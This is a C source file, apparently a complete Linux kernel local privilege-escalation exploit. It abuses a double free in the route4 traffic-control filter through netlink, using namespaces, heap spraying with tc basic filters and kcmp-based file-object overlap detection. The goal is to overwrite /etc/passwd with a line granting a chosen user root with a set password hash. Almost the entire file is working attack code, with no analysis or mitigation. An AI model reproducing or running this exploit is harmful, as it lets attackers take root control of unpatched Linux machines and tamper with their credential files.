1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052
| #define _GNU_SOURCE
#include <arpa/inet.h> #include <assert.h> #include <dirent.h> #include <endian.h> #include <errno.h> #include <fcntl.h> #include <net/if.h> #include <net/if_arp.h> #include <netinet/in.h> #include <sched.h> #include <signal.h> #include <stdarg.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/epoll.h> #include <sys/ioctl.h> #include <sys/ipc.h> #include <sys/mount.h> #include <sys/msg.h> #include <sys/syscall.h> #include <sys/time.h> #include <sys/types.h> #include <sys/uio.h> #include <sys/wait.h> #include <time.h> #include <unistd.h>
#include <sys/shm.h> #include <sys/stat.h> #include <sys/timerfd.h>
#include <linux/tc_ematch/tc_em_meta.h> #include <sys/resource.h>
#include <linux/capability.h> #include <linux/futex.h> #include <linux/genetlink.h> #include <linux/if_addr.h> #include <linux/if_ether.h> #include <linux/if_link.h> #include <linux/if_tun.h> #include <linux/in6.h> #include <linux/ip.h> #include <linux/kcmp.h> #include <linux/neighbour.h> #include <linux/net.h> #include <linux/netlink.h> #include <linux/pkt_cls.h> #include <linux/pkt_sched.h> #include <linux/rtnetlink.h> #include <linux/tcp.h> #include <linux/veth.h>
#include <x86intrin.h>
#include <err.h> #include <fcntl.h> #include <poll.h> #include <pthread.h> #include <stdio.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <sys/utsname.h> #include <unistd.h>
char *target = "/etc/passwd"; char *overwrite = "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:root:/root:/bin/bash\n"; char *global; char *self_path; char *content;
#define PAGE_SIZE 0x1000 #define MAX_FILE_NUM 0x8000
int fds[MAX_FILE_NUM] = {}; int fd_2[MAX_FILE_NUM] = {}; int overlap_a = -1; int overlap_b = -1;
int cpu_cores = 0; int sockfd = -1;
int spray_num_1 = 2000; int spray_num_2 = 4000;
int pipe_main[2]; int pipe_parent[2]; int pipe_child[2]; int pipe_defrag[2]; int pipe_file_spray[2][2];
int run_write = 0; int run_spray = 0; char *passwd; bool overlapped = false;
void DumpHex(const void *data, size_t size) { #ifdef DEBUG char ascii[17]; size_t i, j; ascii[16] = '\0'; for (i = 0; i < size; ++i) { printf("%02X ", ((unsigned char *)data)[i]); if (((unsigned char *)data)[i] >= ' ' && ((unsigned char *)data)[i] <= '~') { ascii[i % 16] = ((unsigned char *)data)[i]; } else { ascii[i % 16] = '.'; } if ((i + 1) % 8 == 0 || i + 1 == size) { printf(" "); if ((i + 1) % 16 == 0) { printf("| %s \n", ascii); } else if (i + 1 == size) { ascii[(i + 1) % 16] = '\0'; if ((i + 1) % 16 <= 8) { printf(" "); } for (j = (i + 1) % 16; j < 16; ++j) { printf(" "); } printf("| %s \n", ascii); } } } #endif }
void pin_on_cpu(int cpu) { cpu_set_t cpu_set; CPU_ZERO(&cpu_set); CPU_SET(cpu, &cpu_set); if (sched_setaffinity(0, sizeof(cpu_set), &cpu_set) != 0) { perror("sched_setaffinity()"); exit(EXIT_FAILURE); } }
static bool write_file(const char *file, const char *what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { int err = errno; close(fd); errno = err; return false; } close(fd); return true; }
static void use_temporary_dir(void) { system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data"); system("touch exp_dir/data2"); char *tmpdir = "exp_dir"; if (!tmpdir) exit(1); if (chmod(tmpdir, 0777)) exit(1); if (chdir(tmpdir)) exit(1); symlink("./data", "./uaf"); }
static void setup_common() { if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) { } }
static void adjust_rlimit() { struct rlimit rlim; rlim.rlim_cur = rlim.rlim_max = (200 << 20); setrlimit(RLIMIT_AS, &rlim); rlim.rlim_cur = rlim.rlim_max = 32 << 20; setrlimit(RLIMIT_MEMLOCK, &rlim); rlim.rlim_cur = rlim.rlim_max = 136 << 20; rlim.rlim_cur = rlim.rlim_max = 1 << 20; setrlimit(RLIMIT_STACK, &rlim); rlim.rlim_cur = rlim.rlim_max = 0; setrlimit(RLIMIT_CORE, &rlim); rlim.rlim_cur = rlim.rlim_max = 14096; if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) { rlim.rlim_cur = rlim.rlim_max = 4096; spray_num_1 = 1200; spray_num_2 = 2800; if (setrlimit(RLIMIT_NOFILE, &rlim) < 0) { perror("setrlimit"); err(1, "setrlimit"); } } }
void setup_namespace() { int real_uid = getuid(); int real_gid = getgid();
if (unshare(CLONE_NEWUSER) != 0) { perror("[-] unshare(CLONE_NEWUSER)"); exit(EXIT_FAILURE); }
if (unshare(CLONE_NEWNET) != 0) { perror("[-] unshare(CLONE_NEWUSER)"); exit(EXIT_FAILURE); }
if (!write_file("/proc/self/setgroups", "deny")) { perror("[-] write_file(/proc/self/set_groups)"); exit(EXIT_FAILURE); } if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) { perror("[-] write_file(/proc/self/uid_map)"); exit(EXIT_FAILURE); } if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) { perror("[-] write_file(/proc/self/gid_map)"); exit(EXIT_FAILURE); } }
#define NLMSG_TAIL(nmsg) \ ((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len)))
int addattr(char *attr, int type, void *data, int len) { struct rtattr *rta = (struct rtattr *)attr;
rta->rta_type = type; rta->rta_len = RTA_LENGTH(len); if (len) { memcpy(RTA_DATA(attr), data, len); }
return RTA_LENGTH(len); }
int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data, int alen) { int len = RTA_LENGTH(alen); struct rtattr *rta;
if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) { fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen); return -1; } rta = NLMSG_TAIL(n); rta->rta_type = type; rta->rta_len = len; if (alen) memcpy(RTA_DATA(rta), data, alen); n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len); return 0; }
struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type) { struct rtattr *nest = NLMSG_TAIL(n);
addattr_l(n, maxlen, type, NULL, 0); return nest; }
int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest) { nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest; return n->nlmsg_len; }
int add_qdisc(int fd) { char *start = malloc(0x1000); memset(start, 0, 0x1000); struct nlmsghdr *msg = (struct nlmsghdr *)start;
msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; msg->nlmsg_type = RTM_NEWQDISC; struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); t->tcm_ifindex = 1; t->tcm_family = AF_UNSPEC; t->tcm_parent = TC_H_ROOT; u_int32_t prio = 1; u_int32_t protocol = 1; t->tcm_info = TC_H_MAKE(prio << 16, protocol);
addattr_l(msg, 0x1000, TCA_KIND, "sfq", 4);
#ifdef DEBUG DumpHex(msg, msg->nlmsg_len); #endif
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; struct msghdr msgh = { .msg_name = &nladdr, .msg_namelen = sizeof(nladdr), .msg_iov = &iov, .msg_iovlen = 1, }; return sendmsg(fd, &msgh, 0); }
int add_tc_(int fd, u_int32_t from, u_int32_t to, u_int32_t handle, u_int16_t flags) { char *start = malloc(0x2000); memset(start, 0, 0x2000); struct nlmsghdr *msg = (struct nlmsghdr *)start;
msg = msg + msg->nlmsg_len; msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); msg->nlmsg_flags = NLM_F_REQUEST | flags; msg->nlmsg_type = RTM_NEWTFILTER; struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));
u_int32_t prio = 1; u_int32_t protocol = 1; t->tcm_info = TC_H_MAKE(prio << 16, protocol); t->tcm_ifindex = 1; t->tcm_family = AF_UNSPEC; t->tcm_handle = handle;
addattr_l(msg, 0x1000, TCA_KIND, "route", 6); struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); addattr_l(msg, 0x1000, TCA_ROUTE4_FROM, &from, 4); addattr_l(msg, 0x1000, TCA_ROUTE4_TO, &to, 4); addattr_nest_end(msg, tail);
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; struct msghdr msgh = { .msg_name = &nladdr, .msg_namelen = sizeof(nladdr), .msg_iov = &iov, .msg_iovlen = 1, };
sendmsg(fd, &msgh, 0);
free(start); return 1; }
void add_tc(int sockfd, uint32_t handle, uint16_t flag) { add_tc_(sockfd, 0, handle, (handle << 8) + handle, flag); }
uint32_t calc_handle(uint32_t from, uint32_t to) { uint32_t handle = to;
assert(from <= 0xff && to <= 0xff); handle |= from << 16;
if (((handle & 0x7f00) | handle) != handle) return 0;
if (handle == 0 || (handle & 0x8000)) return 0; return handle; }
void *delete_tc_(int sockfd, u_int32_t handle) { char *start = malloc(0x4000); memset(start, 0, 0x4000); struct nlmsghdr *msg = (struct nlmsghdr *)start;
msg = msg + msg->nlmsg_len; msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO; msg->nlmsg_type = RTM_DELTFILTER; struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));
u_int32_t prio = 1; u_int32_t protocol = 1; t->tcm_info = TC_H_MAKE(prio << 16, protocol); t->tcm_ifindex = 1; t->tcm_family = AF_UNSPEC; t->tcm_handle = handle;
addattr_l(msg, 0x1000, TCA_KIND, "route", 6); struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); addattr_nest_end(msg, tail);
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; struct msghdr msgh = { .msg_name = &nladdr, .msg_namelen = sizeof(nladdr), .msg_iov = &iov, .msg_iovlen = 1, };
sendmsg(sockfd, &msgh, 0); memset(start, 0, 0x4000); iov.iov_len = 0x4000; iov.iov_base = start; recvmsg(sockfd, &msgh, 0);
if (msgh.msg_namelen != sizeof(nladdr)) { printf("size of sender address is wrong\n"); } return start; }
void delete_tc(int sockfd, uint32_t handle) { delete_tc_(sockfd, ((handle) << 8) + (handle)); }
int add_tc_basic(int fd, uint32_t handle, void *spray_data, size_t spray_len, int spray_count) { assert(spray_len * spray_count < 0x3000); char *start = malloc(0x4000); memset(start, 0, 0x4000); struct nlmsghdr *msg = (struct nlmsghdr *)start;
msg = msg + msg->nlmsg_len; msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; msg->nlmsg_type = RTM_NEWTFILTER; struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));
u_int32_t prio = 1; u_int32_t protocol = 1; t->tcm_info = TC_H_MAKE(prio << 16, protocol); t->tcm_ifindex = 1; t->tcm_family = AF_UNSPEC; t->tcm_handle = handle;
addattr_l(msg, 0x4000, TCA_KIND, "basic", 6); struct rtattr *tail = addattr_nest(msg, 0x4000, TCA_OPTIONS); struct rtattr *ema_tail = addattr_nest(msg, 0x4000, TCA_BASIC_EMATCHES); struct tcf_ematch_tree_hdr tree_hdr = {.nmatches = spray_count / 2, .progid = 0};
addattr_l(msg, 0x4000, TCA_EMATCH_TREE_HDR, &tree_hdr, sizeof(tree_hdr)); struct rtattr *rt_match_tail = addattr_nest(msg, 0x4000, TCA_EMATCH_TREE_LIST);
char *data = malloc(0x3000); for (int i = 0; i < tree_hdr.nmatches; i++) { char *current; memset(data, 0, 0x3000); struct tcf_ematch_hdr *hdr = (struct tcf_ematch_hdr *)data; hdr->kind = TCF_EM_META; hdr->flags = TCF_EM_REL_AND;
current = data + sizeof(*hdr);
struct tcf_meta_hdr meta_hdr = { .left.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV, .right.kind = TCF_META_TYPE_VAR << 12 | TCF_META_ID_DEV, };
current += addattr(current, TCA_EM_META_HDR, &meta_hdr, sizeof(hdr)); current += addattr(current, TCA_EM_META_LVALUE, spray_data, spray_len); current += addattr(current, TCA_EM_META_RVALUE, spray_data, spray_len);
addattr_l(msg, 0x4000, i + 1, data, current - data); }
addattr_nest_end(msg, rt_match_tail); addattr_nest_end(msg, ema_tail); addattr_nest_end(msg, tail);
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; struct msghdr msgh = { .msg_name = &nladdr, .msg_namelen = sizeof(nladdr), .msg_iov = &iov, .msg_iovlen = 1, }; sendmsg(fd, &msgh, 0); free(data); free(start); return 1; }
void *delete_tc_basic(int sockfd, u_int32_t handle) { char *start = malloc(0x4000); memset(start, 0, 0x4000); struct nlmsghdr *msg = (struct nlmsghdr *)start;
msg = msg + msg->nlmsg_len; msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_ECHO; msg->nlmsg_type = RTM_DELTFILTER; struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr));
u_int32_t prio = 1; u_int32_t protocol = 1; t->tcm_info = TC_H_MAKE(prio << 16, protocol); t->tcm_ifindex = 1; t->tcm_family = AF_UNSPEC; t->tcm_handle = handle;
addattr_l(msg, 0x1000, TCA_KIND, "basic", 6); struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); addattr_nest_end(msg, tail);
struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; struct msghdr msgh = { .msg_name = &nladdr, .msg_namelen = sizeof(nladdr), .msg_iov = &iov, .msg_iovlen = 1, };
sendmsg(sockfd, &msgh, 0); memset(start, 0, 0x4000); iov.iov_len = 0x4000; iov.iov_base = start; recvmsg(sockfd, &msgh, 0);
if (msgh.msg_namelen != sizeof(nladdr)) { printf("size of sender address is wrong\n"); }
return start; }
void *slow_write() { printf("start slow write\n"); clock_t start, end; int fd = open("./uaf", 1);
if (fd < 0) { perror("error open uaf file"); exit(-1); }
unsigned long int addr = 0x30000000; int offset; for (offset = 0; offset < 0x80000 / 20; offset++) { void *r = mmap((void *)(addr + offset * 0x1000), 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0); if (r < 0) { printf("allocate failed at 0x%x\n", offset); } }
assert(offset > 0);
void *mem = (void *)(addr); memcpy(mem, "hhhhh", 5);
struct iovec iov[20]; for (int i = 0; i < 20; i++) { iov[i].iov_base = mem; iov[i].iov_len = offset * 0x1000; }
run_write = 1; start = clock(); if (writev(fd, iov, 20) < 0) { perror("slow write"); } end = clock(); double spent = (double)(end - start) / CLOCKS_PER_SEC; printf("write done, spent %f s\n", spent); run_write = 0; }
void *write_cmd() { char data[1024] = "user:$1$user$k8sntSoh7jhsc6lwspjsU.:0:0:/root/root:/bin/bash"; struct iovec iov = {.iov_base = content, .iov_len = strlen(content)};
while (!run_write) { } run_spray = 1; if (writev(overlap_a, &iov, 1) < 0) { printf("failed to write\n"); } printf("should be after the slow write\n"); }
void pre_exploit() { adjust_rlimit(); use_temporary_dir(); setup_namespace(); }
void exploit() { char buf[2 * PAGE_SIZE] = {}; char msg[0x10] = {}; char *spray; int cc; struct rlimit old_lim, lim, new_lim;
if (getrlimit(RLIMIT_NOFILE, &old_lim) == 0) printf("Old limits -> soft limit= %ld \t" " hard limit= %ld \n", old_lim.rlim_cur, old_lim.rlim_max); pin_on_cpu(0); printf("starting exploit, num of cores: %d\n", cpu_cores);
sockfd = socket(PF_NETLINK, SOCK_RAW, 0); assert(sockfd != -1); add_qdisc(sockfd);
if (read(pipe_child[0], msg, 2) != 2) { err(1, "read from parent"); } add_tc_(sockfd, 0, 0, 0, NLM_F_EXCL | NLM_F_CREATE);
if (write(pipe_parent[1], "OK", 2) != 2) { err(1, "write to child"); } if (read(pipe_child[0], msg, 2) != 2) { err(1, "read from parent"); }
add_tc_(sockfd, 0x11, 0x12, 0, NLM_F_CREATE);
usleep(500 * 1000); printf("freed the filter object\n"); if (write(pipe_parent[1], "OK", 2) != 2) { err(1, "write to child"); } if (read(pipe_child[0], msg, 2) != 2) { err(1, "read from parent"); }
usleep(1000 * 1000);
for (int i = 0; i < spray_num_1; i++) { pin_on_cpu(i % cpu_cores); fds[i] = open("./data2", 1); assert(fds[i] > 0); }
add_tc_(sockfd, 0x11, 0x13, 0, NLM_F_CREATE); usleep(1000 * 100);
printf("double free done\n"); printf("spraying files\n");
for (int i = 0; i < spray_num_2; i++) { pin_on_cpu(i % cpu_cores); fd_2[i] = open("./uaf", 1); assert(fd_2[i] > 0); for (int j = 0; j < spray_num_1; j++) { if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, fds[j], fd_2[i]) == 0) { printf("found overlap, id : %d, %d\n", i, j); overlap_a = fds[j]; overlap_b = fd_2[i];
pthread_t pid, pid2; pthread_create(&pid, NULL, slow_write, NULL); pthread_create(&pid2, NULL, write_cmd, NULL);
while (!run_spray) { }
close(overlap_a); close(overlap_b); printf("closed overlap\n");
usleep(1000 * 100);
int spray_num = 4096; write(pipe_file_spray[0][1], &spray_num, sizeof(int)); if (read(pipe_file_spray[1][0], &msg, 2) != 2) { err(1, "read from file spray"); } overlapped = true; } } if (overlapped) break; }
sleep(3); while (run_write) { sleep(1); }
if (!overlapped) { printf("no overlap found :(...\n"); write(pipe_main[1], "\xff", 1); } else { int xx = open(target, 0); char buf[0x100] = {}; read(xx, buf, 0x30); if (!strncmp(buf, "user", 4)) { write(pipe_main[1], "\x00", 1); } else { printf("not successful : %s\n", buf); write(pipe_main[1], "\xff", 1); } } while (1) { sleep(1000); } }
void post_exploit() {}
int run_exp() { if (pipe(pipe_parent) == -1) { err(1, "fail to create pipes\n"); }
if (pipe(pipe_child) == -1) { err(1, "fail to create pipes\n"); }
if (pipe(pipe_defrag) == -1) { err(1, "fail to create pipes\n"); }
if (pipe(pipe_file_spray[0]) == -1) { err(1, "fail to create pipes\n"); }
if (pipe(pipe_file_spray[1]) == -1) { err(1, "fail to create pipes\n"); }
cpu_cores = sysconf(_SC_NPROCESSORS_ONLN);
if (fork() == 0) { adjust_rlimit(); int spray_num = 0; if (read(pipe_file_spray[0][0], &spray_num, sizeof(int)) < sizeof(int)) { err(1, "read file spray"); }
printf("got cmd, start spraying %s\n", target); spray_num = 4096; if (fork() == 0) { for (int i = 0; i < spray_num; i++) { pin_on_cpu(i % cpu_cores); open(target, 0); } while (1) { sleep(10000); } }
for (int i = 0; i < spray_num; i++) { pin_on_cpu(i % cpu_cores); open(target, 0); } printf("spray done\n"); write(pipe_file_spray[1][1], "OK", 2); while (1) { sleep(10000); } exit(0); }
if (fork() == 0) { pin_on_cpu(0); pre_exploit(); exploit(); post_exploit(); } else { sleep(2); if (fork() == 0) { adjust_rlimit(); for (int i = 0; i < 10000; i++) { pin_on_cpu(i % cpu_cores); open(target, 0); } printf("defrag done\n"); if (write(pipe_defrag[1], "OK", 2) != 2) { err(1, "failed write defrag"); } while (1) { sleep(1000); } } else { setup_namespace(); pin_on_cpu(0); int sprayfd = socket(PF_NETLINK, SOCK_RAW, 0); assert(sprayfd != -1); add_qdisc(sprayfd);
char msg[0x10] = {}; char payload[256] = {}; memset(payload + 0x10, 'A', 256 - 0x10);
if (read(pipe_defrag[0], msg, 2) != 2) { err(1, "failed read defrag"); }
int middle = 38; int end = middle + 40;
for (int i = 0; i < middle; i++) { add_tc_basic(sprayfd, i + 1, payload, 193, 32); }
add_tc_basic(sprayfd, middle + 1, payload, 193, 32); add_tc_basic(sprayfd, middle + 2, payload, 193, 32); add_tc_basic(sprayfd, middle + 3, payload, 193, 32); if (write(pipe_child[1], "OK", 2) != 2) { err(1, "write to parent\n"); } if (read(pipe_parent[0], msg, 2) != 2) { err(1, "read from parent"); }
for (int i = middle + 2; i < end; i++) { add_tc_basic(sprayfd, i + 1, payload, 193, 32); } printf("spray 256 done\n");
for (int i = 1; i < end - 24; i++) { if (i == middle || i == middle + 1) continue; delete_tc_basic(sprayfd, i + 1); } if (write(pipe_child[1], "OK", 2) != 2) { err(1, "write to parent\n"); } if (read(pipe_parent[0], msg, 2) != 2) { err(1, "read from parent"); } delete_tc_basic(sprayfd, middle + 2); delete_tc_basic(sprayfd, middle + 3); delete_tc_basic(sprayfd, 1); for (int i = middle + 2; i < end; i++) { delete_tc_basic(sprayfd, i + 1); }
printf("256 freed done\n");
if (write(pipe_child[1], "OK", 2) != 2) { err(1, "write to parent\n"); } while (1) { sleep(1000); } } } }
int main(int argc, char **argv) { global = (char *)mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_ANON, -1, 0); memset(global, 0, 0x2000);
self_path = global; snprintf(self_path, 0x100, "%s/%s", get_current_dir_name(), argv[0]); printf("self path %s\n", self_path);
int fd = open(target, 0); content = (char *)(global + 0x100); strcpy(content, overwrite); read(fd, content + strlen(overwrite), 0x1000); close(fd);
assert(pipe(pipe_main) == 0);
printf("prepare done\n");
if (fork() == 0) { run_exp(); while (1) { sleep(10000); } }
char data; read(pipe_main[0], &data, 1); if (data == 0) { printf("succeed\n"); } else { printf("failed\n"); } }
|